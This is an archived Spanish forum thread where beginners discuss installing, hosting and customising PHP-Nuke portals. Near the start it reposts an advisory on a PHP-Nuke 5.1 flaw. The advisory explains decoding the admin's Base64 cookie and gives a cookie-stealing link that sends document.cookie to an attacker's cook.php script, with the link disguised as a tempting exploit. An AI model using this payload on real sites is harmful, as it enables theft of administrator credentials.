el Hilo de PHP-Nuke

Archivado
Yo creo k entre todos deberiamos crear o hacer un hilo k trate sobre el PHP-NUKE XD Yo no tengo ni idea de esto pero veo k la gente esta muy interesada ...
weno yo aportaré mi granito de arena; aki teneís algunas web ke tratan el Php-Nuke en español
http://www.phpnuke-hispano.org
http://www.phpnuke-espanol.org/
Bug en Php-Nuke 5.1


Nuevamente se ha encontrado una vulnerabilidad en los sistemas de portales de phpnuke en este caso la versión 5.1, el bug consiste en robar el nombre de usuario y el password del administrador del sistema phpnuke, ya que estas como todos sabemos se guardan en una Cookie, como se muestra a continuación :



-----------0------------
lang
english
plastelinux.com/
0
725504896
29523774
551579360
29450340
*
admin
QWRtaW46TmljZV9Ucnk6DQo=
plastelinux.com/
0
1451582336
29456384
3432929360
29450340
*
-----------0------------
Nos damos cuenta que la contraseña esta encriptada como BASE64, en el ejemplo del Cookie anterior vemos que la contraseña de Admin es : QWRtaW46TmljZV9Ucnk6DQo=

si decodificamos estos caracteres obtenemos el nombre de usuario y la contraseña del admin

( para decodificar visitar http://www.gauchohack.com.ar/base64.htm ) .

Bueno esta es una forma de obtener el user y pass del admin, y otra forma de hacerse con estas es la siguiente.
hace poco fue descubierta una vulnerabilidad en el famoso navegador Internet Explorer, la misma fue llamada como "Microsoft IE Cookies Exposure via 'About:' URLS"

( pueden leer mas acerca de este bug visitar http://www.securiteam.com/windowsntfocus/6I00D1535I.html )

Ok, la forma de explotar esto es asi:
Primero hay que crear un script en PHP que pueda recoger getenv("QUERY_STRING") en un archivo, entonces se crea un link y se obliga a el administrador del sitio phpnuke a que haga click en el, seria algo asi:

[a
href="about://www.sitio-nuke.com/[script]window.open("http://www.nuestroweb
.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9
remote root exploit ![/a]

(reemplace [&] por )
http://www.sitio-nuke.com ______ es el sitio que usted quiere conseguir el Cookie.
http://www.nuestroweb.com ______ es el sitio al que manda el Cookie al recibir el
script cook.php.

Si logramos que el admin del sitio nuke siga este link, él enviará a nuestro script su Cookie codificado con Base64 con la contraseña y el user entonces solo quedara decodificarlo de la forma explicada anteriormente.
-------------------
sakado de http://www.phpnuke-hispano.org/
¿Alguien sabe servidores para publicar las webs realizadas con PHP-NUKE?
Segun php hispano en multimania.com ke te lleva a http://www.multimania.lycos.fr/ o si no en http://www.host.sk/

Por cierto yo he leido en php espanol manuales de como instalarlo pero es ke no entiendo nada de nada. :-?
estoy haciendo una web con el dreamweaver, y ahora una pregunta, m he bajado un php q sirve para mandar msj a moviles, como hago para introducirlo en la web?
Requerimientos:
Tener instalado Apache, PHP y MySQL
Sistema Operativo:
Linux, Unix, Windows, FreeBSD, etc.
Yo creo que esos son los requisitos para instalar php en un servidor, pero no para hacer una web en PHP.
Tu subes una página en PHP a un servidor que lo tenga instalado y ya está, tú no tienes porqué tener instalado nada.

Un saludo.
¿Q ES PHP-NUKE UN PROGRAMA PARA HACER WEBS EN PHP O UN SERVIDOR PHP?

el hilo debería de empezar x esa pregunta XD pero weno haber si conseguimos hacer un hilo decente
PHP-Nuke es una web ya hecha en PHP, pero la pudes personalizar y todo eso, no es un programa para hacer webs en PHP. Debe ir colocado en un servidor que tenga instalado los programas que pones hay abajo.

El servidor lleva instalado el PHP porque el código PHP se ejecuta en el servidor, de forma que en tu ordenador se ve una web normal pero la página en el servidor tiene contiene código PHP, aunque también lleve HTML.

Un saludo.
digamos k yo kiero crear una web mediante PHP-NUKE y me abro una kuenta en uno de esos servers k admite PHP; x ejemplo, multimania XD . ¿K me tengo k bajar para hacer la web desde la pagina de http://www.phpnuke-hispano.org ?
Nuevo server k admite PHP XD aki teneís el mensaje:
"Según leo hoy en un correo enviado por Lycos-tripod.es, a partir de este miercoles 13, el espacio web que hasta ahora ofrecia este portal, llamado como sabeis tripod, contará tambien con soporte mysql y php4.

De sobras es sabido lo dificil que era tener un buen host gratuito donde ubicar nuestros nukes. Así que ya sabeis a llenar tripod de phpnukes XD

http://www.tripod.es
Eso ya no lo sé. Me imagino que con bajarte el la versión de PHP Nuke que quieras, ponerle la traducción al castellano y subirlo.
Pero ya te digo que de eso no tengo ni idea, prueba a ver que pasa y ya contarás :)

Un saludo.
por estos lares de EOL suele pasar mucha gente k sabe de informatika XD y entre uno de ellos Ark Del Kaos y sus amigos ke tienen una web con el Nuke-PHP ; x eso haber si participan más en este hilo ya k ellos saben algo del tema y han creado una web mediante este lenguaje tan bonito XD XD XD XD
yo lo voy a dejar por imposible...... http://skacha.host.sk solo he conseguido eso, ahora no tengo ni idea de lo ke tengo ke hacer. Segun me han dicho tengo ke conectar las bases de datos....pero ni idea de como se hace. A ver si ark del kaos se pasa por aki y me lee :P
hazlo en multimania y sigue estas instrucciones
Originalmente enviado por HADES
Yo creo que esos son los requisitos para instalar php en un servidor, pero no para hacer una web en PHP.
Tu subes una página en PHP a un servidor que lo tenga instalado y ya está, tú no tienes porqué tener instalado nada.

Un saludo.


Si instalas esos programas (o uno que integre a todos, por ejemplo phptriad) te montas tu propio servidor, pero si quieres diseñar algo en phpnuke, debes instalartelos para que puedas configurar tu página ;)

PD: el phptriad es bastante facil de configurar;)
Bueno, no os quedeis ahi, please, me he bajado el phptriad y el php-nuke, bien en localhost me carga todito pero claro todo por defecto, lo unico que he sabido cambiar es el theme, pero quiero profundizar mas, teniendo en cuenta que no tengo ni idea de programar ( 0 patatero ) qye herramienta ( visual ) me recomendais?
Si quereis puedo hecharos una mano...[jaja]
Enga, hechanos una mano ( o 2 ;) )
Bueno...pues en ese caso...
Creo que lo mejor que se puede hacer es tener cierto control sobre el hilo.
Me explico...primero se hace un hilo de indice...donde se colocan los links a otros mensages dentro de este...
Asi queda muy bien...
Y luego se lleva a cabo...poco a poco

Sobre el php-nuke...la verdad?
Pues no me gusta...lo encuentro una forma de plagiar el curro de otro y enciam todas las webs salen =...pero para meter trabajo entre varios mola, la verdad...

Y eso...si os digo que lo de hacer de mi pc calenton un server es para que los de multimania no me metieran mierda y tener todas las posibilidades...
...Me explico...primero se hace un hilo de indice...donde se colocan los links a otros mensages dentro de este...
Asi queda muy bien...



Si Ark tienes razón con el indice kedaría muy bien; XD pero yo creo k el problema esta ke yo hize el hilo para ver ke tal respondia la gente de [EOL] y haber si el tema podia interesar.
Ahora veo k el tema interesa, ya sea xq algunos esten intentado hacer su web con el PHP-NUKE o xq a algunos les interese saber algo más sobre este lenguaje para hacer webs ... pero el problema esta k yo (tb la gente de eol) hice el hilo sin tener mucha idea sobre el tema; entonces x mi parte falta un poko de base como para hacer un hilo decente XD XD Yo creo k lo ideal sería k gente k ha creado sus webs con este programa se juntará e hicieran el hilo k estamos intentado hacer ... Estoy seguro ke más de uno de [EOL] a usado este programa/lenguaje para crear su web ... XD XD XD XD XD

P.D. Ark creo haber leido k buskabas ideas para hacer tutos y manuales no? Pues aki tienes una idea, y haber ke tal responde la gente ...
Originalmente enviado por Newton



Si Ark tienes razón con el indice kedaría muy bien; XD pero yo creo k el problema esta ke yo hize el hilo para ver ke tal respondia la gente de [EOL] y haber si el tema podia interesar.
Ahora veo k el tema interesa, ya sea xq algunos esten intentado hacer su web con el PHP-NUKE o xq a algunos les interese saber algo más sobre este lenguaje para hacer webs ... pero el problema esta k yo (tb la gente de eol) hice el hilo sin tener mucha idea sobre el tema; entonces x mi parte falta un poko de base como para hacer un hilo decente XD XD Yo creo k lo ideal sería k gente k ha creado sus webs con este programa se juntará e hicieran el hilo k estamos intentado hacer ... Estoy seguro ke más de uno de [EOL] a usado este programa/lenguaje para crear su web ... XD XD XD XD XD

P.D. Ark creo haber leido k buskabas ideas para hacer tutos y manuales no? Pues aki tienes una idea, y haber ke tal responde la gente ...


Bueno...si quieres echarme una mano...que supongo que si, le metemos caña[jaja]

Ahora estoy metido en los cursos de mi firma y en uno de firewalls. Asi que por uno mas no pasa nada [jaja]
OK XD Ark t tomo la palabra pero no te obligo a nada XD con ke te pases algunas veces x el hilo y resuelvas dudas yasta! XD XD Kuando tengas tiempo libre, si podeís hacer algun tuto o manual sería de buen ver para tod@s los k andamos pez en este tema. Pero x ahora hay prioridades, las respeto y las entiendo XD XD
Nooo...si te digo que de acuerdo...
De echo, estoy escribiendo ahora una seccion para el de flash...
En cuanto este te meto el indice si quieres...
AH! y si miras el hilo del diccionario de argot, veras el sistema ya rulando...
Curso de Codigo PHP
_____________________________


Introduccion basica:

EL sistema de codigo PHP:
PHP frente a otros codigos:
Servidores:
El codigo PHP:


<<--------------EN BREVE------------>>

PHP-Nuke, la web portal:

El sistema PHP-Nuke:
Problematica del nuke:
Instlacion:
La base de datos:
Creacion de menus flotantes:
Distincion de usuarios:
Los temas:
Aspecto visual:
VBoard, el PHP hecho foro:

El sistema VBoard:
Instalacion:
La base de datos:
Creacion de el foro:
Uploads: Los archivos adjuntos.
Modificar el aspecto:
Modificaciones Avanzadas:
Tipos de usuario:
he subido el phpnuke, he configurado el config.php, me he hecho la cuenta de administrador, pero cuando voy a hacer login en lo de administrador no me deja, me sale la misma pagina:-? :-? :-?

Salu2
Originalmente enviado por Baiki
he subido el phpnuke, he configurado el config.php, me he hecho la cuenta de administrador, pero cuando voy a hacer login en lo de administrador no me deja, me sale la misma pagina:-? :-? :-?

Salu2


Tengo entendido q eso pasa x algun ug, tienes q editar el archivo user.php, lo tengo x aqui, pero es q ahora tengo el ordenata hecho una mierda y no lo encuentro. En cuanto lo encuentre t digo q es lo q tienes q mover, x cierto, si puedes t bajas el php nuke 5.5 q creo q ya lo trae arrglado. Salu2
lo he hecho con el 5.5
Ark, cuando hablas del VBoard, supongo q te refieres a los vBulletin, no??

entonces, seria mejor usar unos foros alternativos, ya q los vB no son gratuitos. Propongo los phpBB 2.0RC4 q tengo rulando en mi web, son de lo mejorcito y además gratis :)
weno aki os pongo un enlace a una web donde hay imagenes de themes (skins) para el php-nuke:p http://rosaritostyle.com/
Originalmente enviado por ZeusII
Ark, cuando hablas del VBoard, supongo q te refieres a los vBulletin, no??

entonces, seria mejor usar unos foros alternativos, ya q los vB no son gratuitos. Propongo los phpBB 2.0RC4 q tengo rulando en mi web, son de lo mejorcito y además gratis :)



donde los consigo en http://www.phpbb.com solo esta la version 1.4:-? :-?


PD:el problema del login solucionado
Originalmente enviado por Baiki



PD:el problema del login solucionado


como lo has solucionado, yo creo q tb lo he soluionado, pero no estoy seguroX-D
pues borre de la base de datos los antiguos usuario lo hice de nuevo con una clave de 4 cifras y puse k tambien creara un usuario simple con ese nombre y me funciona

Salu2
Uy...he aqui un hilo que tengo perdido de la mano de dios...
Me pongo en breve eh?
enga, haber si es verdad y hacemos ke el hilo funcioné XD
hola estoi intentando hacer una web en php nuke y kisiera saber k archivo es el k tengo k subir para poder hacer la web
Originalmente enviado por mathius III
hola estoi intentando hacer una web en php nuke y kisiera saber k archivo es el k tengo k subir para poder hacer la web


tienes q subir todo lo q viene comprimido, y en la carpeta DOCS te explica como instalarlo ;) no dudes en leerte todos los documentos q hay
donde esta el archivo doc, y lo k no se es como modificar el arhivo config.php [beer]
donde esta el archivo doc, y lo k no se es como modificar el arhivo config.php [beer]
Originalmente enviado por mathius III
donde esta el archivo doc, y lo k no se es como modificar el arhivo config.php [beer]


mira,los archivos que tienes que leerte son: INSTALL y README ambos estan en la carpeta raiz donde has descomprimido el nuke.

editar el config.php? usa el ultraedit o el block de notas (te recomiendo el ultraedit),pero ojito con lo que tocas que te puedes cargar la web si no sabes usarlo.

supongo que sabras que tienes que tener instalado el mysql,el apache y el php para hacer correr el phpnuke en tu máquina,no?

cuando vayas a subirla a algun servidor,te recomiendo host.sk que,al menos a mi,no me ha dado problemas con el uso del mail() (indispensable para que funcione el proceso de una creacion de cuenta en el sistema).

Ah,se me olvidaba,es recomendable que te instales el phpMyAdmin que te va a servir para poder gestionar la base de datos de mysql de una forma más comoda que tener que estar usando la linea de comandos ;)
me lo he bajado la version 5.3.3.1 creo me la descomprimo
pero no biene nada para hacer la web
cuales son los pasos q se tiene q seguir para hacerla??
es facil de hacer??
cual es mejor este o el front page??
[idea]
Bueno, uno mas interesado en intentar dar vidilla este hilo (pa aprender, no pa enseñar, que no temgo ni idea). A ver si subiendolo la peña interesada se apunta.

Saludpos
Lamento este reflote pero prefiero hacerlo en el hilo oficial antes que llevarme la bronca por no usar la busqueda (lo cual he hecho X-D)

Donde se encuentran todos los mensajes, usuarios y noticias de un PHP? Es porque voy a cambiar el servidor de la web (me paso a linux) y me gustaria llevarme todo X-D

Saludos!
rapt0r escribió:Donde se encuentran todos los mensajes, usuarios y noticias de un PHP? Es porque voy a cambiar el servidor de la web (me paso a linux) y me gustaria llevarme todo X-D

Saludos!


En la base de datos no??
Si, pero mi duda es como portarla... o como poder llevarmela para luego implantarla en un nuevo foro (soy muy muy muy novato [decaio] (en php [burla2] ))

Por cierto ya de paso, puede que esten ocultos algunos archivos en el FTP? [sonrisa]

Saludos!
eso ya no es php, eso es MySQL.
Nadie habla de http://www.truzone.org ??

Me voy a tener que poner en marcha aquí... :)

Por cierto, este hilo también será interesante saberlo

http://www.elotrolado.net/showthread.php?s=&threadid=556331

Saludossss
Nuevas noticias sobre Dedalus!!! Y muy buenas, dentro de poco, la fase de testeo [burla2]

http://truzone.org/modules.php?name=News&file=article&sid=1508


Saludosss
48 respuestas
Archivado
Volver a General